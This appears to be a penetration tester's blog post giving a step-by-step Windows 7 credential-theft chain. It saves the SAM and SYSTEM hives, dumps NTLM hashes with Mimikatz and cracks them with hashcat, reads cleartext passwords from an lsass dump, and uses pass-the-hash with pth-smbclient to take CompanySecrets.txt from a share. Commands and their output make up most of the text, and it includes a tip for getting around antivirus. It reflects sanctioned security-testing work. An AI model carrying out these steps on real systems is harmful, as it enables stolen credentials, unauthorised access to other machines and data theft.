Mimikatz allows users to view and save authentication credentials such as Kerberos tickets and Windows credentials. It is freely available via GitHub. This post is not a tutorial on how to use Mimikatz; it lists the commands that I recently had to use during an assignment in an old Windows 7 environment.
Workflow: From registry
- Dump hashes from registry;
- Use this dump offline to extract the hashes with Mimikatz;
- Crack the hashes with hashcat.
Because most unaltered versions of Mimikatz are blocked by the antivirus, you cannot always extract the passwords from memory on the victim machine. To overcome this problem you have to export two registry files, copy these files to a machine under your control and do the remainder of the work on that machine.
Note that (especially within a Windows domain) you do not always need the password; sometimes you can just reuse the hash. However, sometimes you need the password to access a specific service that is linked to AD authentication but has its own very strict lock-out policy.
Dump hives from registry
We need to export two registry hives. You need to be (local) administrator to run these commands.

```
C:\Users\me\Desktop>reg save hklm\sam sam.hiv
The operation completed successfully.

C:\Users\me\Desktop>reg save hklm\system system.hiv
The operation completed successfully.
```
This gives you the two necessary registry files. If the registry files are in use you can use the last copies that are stored in the Volume Shadow Copy.
```
C:\Users\me\Desktop>vssadmin list shadows
Contained 1 shadow copies at creation time: 3/7/2019 7:46:39 PM
```

Based on the above output you can then find the copies in \\localhost\C$\@GMT-2019.03.07-18.46.39 (adjust the path to the latest shadow copy creation time).
Now start Mimikatz and enable the Administrator privileges.
To keep track of all your commands (and their output) you should enable logging.
Now run the lsadump command in offline mode.
```
mimikatz # lsadump::sam /sam:sam.hiv /system:system.hiv
RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0

RID  : 000001f5 (501)
User : Guest

RID  : 000003eb (1003)
User : test
  Hash NTLM: a2345375a47a92754e2505132aca194b

RID  : 000003ec (1004)
User : test2
  Hash NTLM: f0873f3268072c7b1150b15670291137
```
Notice the hash for the Administrator (31d6cfe0d16ae931b73c59d7e0c089c0). This exact hash indicates the local admin account has been disabled. In this case we want to use the hashes for user test and user test2. Copy and paste the Hash NTLM value into a text file.
Next we have to run hashcat to crack the passwords. This can take a very long time and should only be run on dedicated hardware (read the FAQ for more insight). For this example I used a small dictionary. You can find more dictionaries at packetstormsecurity and md5this. We start hashcat with these options:
- -m 1000 : set the hash type to NTLM;
- -a 0 : use a dictionary as attack mode;
- --force : ignore errors for running it on non-ideal hardware.
The output (redacted below) of the hashcat command then gives you the found passwords.
```
a2345375a47a92754e2505132aca194b:windows
f0873f3268072c7b1150b15670291137:linux

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: hash.txt
Candidates.#1....: computer -> keyboard
```
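The two outputs above (lsadump::sam and the cracked hashcat lines) can be joined into a password-audit report. This is an added example, not code from the post or from Mimikatz; the sample strings are constructed from the output shown above, and the constant 31d6cfe0d16ae931b73c59d7e0c089c0 is the well-known NT hash of an empty password, which is why it is flagged separately.

```python
import re
# Well-known NT hash of an empty password; the Administrator entry above shows it.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed samples: the lsadump::sam and hashcat output shown above.
LSADUMP_OUTPUT = """\
RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
RID  : 000001f5 (501)
User : Guest
RID  : 000003eb (1003)
User : test
  Hash NTLM: a2345375a47a92754e2505132aca194b
RID  : 000003ec (1004)
User : test2
  Hash NTLM: f0873f3268072c7b1150b15670291137
"""
HASHCAT_OUTPUT = "a2345375a47a92754e2505132aca194b:windows\nf0873f3268072c7b1150b15670291137:linux\n"
RID_RE = re.compile(r"RID\s*:\s*[0-9a-f]+\s*\((\d+)\)", re.I)
USER_RE = re.compile(r"User\s*:\s*(\S+)")
HASH_RE = re.compile(r"Hash NTLM:\s*([0-9a-f]{32})", re.I)

def parse_lsadump(text):
    """Return [(rid, user, nthash)]; nthash is None when no hash line follows (Guest above)."""
    accounts = []
    for line in text.splitlines():
        if m := RID_RE.match(line):
            accounts.append([int(m.group(1)), None, None])
        elif (m := USER_RE.match(line)) and accounts:
            accounts[-1][1] = m.group(1)
        elif (m := HASH_RE.search(line)) and accounts:
            accounts[-1][2] = m.group(1).lower()
    return [tuple(a) for a in accounts]

def audit(lsadump_text, hashcat_text):
    """Classify each account as no-hash, empty-password, cracked:<password> or ok."""
    # hashcat prints each cracked entry as hash:password, one per line
    cracked = dict(l.split(":", 1) for l in hashcat_text.splitlines() if ":" in l)
    report = {}
    for _rid, user, h in parse_lsadump(lsadump_text):
        if h is None:
            report[user] = "no-hash"
        elif h == EMPTY_NT_HASH:
            report[user] = "empty-password"
        else:
            report[user] = "cracked:" + cracked[h] if h in cracked else "ok"
    return report
```

Running audit(LSADUMP_OUTPUT, HASHCAT_OUTPUT) on the constructed samples reports Administrator as empty-password, Guest as no-hash and the two test accounts as cracked.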
Workflow: From memory
Another method for obtaining passwords (on Windows 7, when KB2871997 is not applied) is to read the plaintext passwords from memory. To do this you need to dump the lsass process.
Dump the process
There are different ways for dumping the memory of a process. One way is via the Windows Task Manager.
- Start the Task Manager;
- Search for the process lsass.exe;
- Right click and choose ‘Create Dump file’.
Start Mimikatz again.
Instead of using the offline lsadump we now use sekurlsa. In the output (redacted below) you can see that Mimikatz displays the clear text password found from memory.
```
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz # sekurlsa::logonPasswords
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 1081762 (00000000:001081a2)
Session           : Interactive from 1
User Name         : test
Domain            : WIN7
Logon Server      : WIN7
...
         * Username : test
         * Domain   : WIN7
         * Password : secretpassword
```
On older systems you can use the pass-the-hash technique to get access to the files. On Kali do this to list the shares.
```
root@kali:~# pth-smbclient --pw-nt-hash -L 192.168.218.210 --user=test \\\\192.168.218.210\\c$ a2345375a47a92754e2505132aca194b

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Quarantine      Disk      Test Quarantine
        Users           Disk
Reconnecting with SMB1 for workgroup listing.
Connection to 192.168.218.210 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
```
We want to explore what is hidden in the Quarantine share.

```
root@kali:~# pth-smbclient --pw-nt-hash --user=test \\\\192.168.218.210\\Quarantine a2345375a47a92754e2505132aca194b
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Nov 16 16:25:12 2016
  ..                                  D        0  Wed Nov 16 16:25:12 2016
  CompanySecrets.txt                  A     4202  Wed Nov 16 18:41:33 2016
  Stinger                             D        0  Wed Nov 16 15:33:36 2016

                8362081 blocks of size 4096. 501817 blocks available
smb: \> get CompanySecrets.txt
getting file \CompanySecrets.txt of size 4202 as CompanySecrets.txt (1025.9 KiloBytes/sec) (average 1025.9 KiloBytes/sec)
```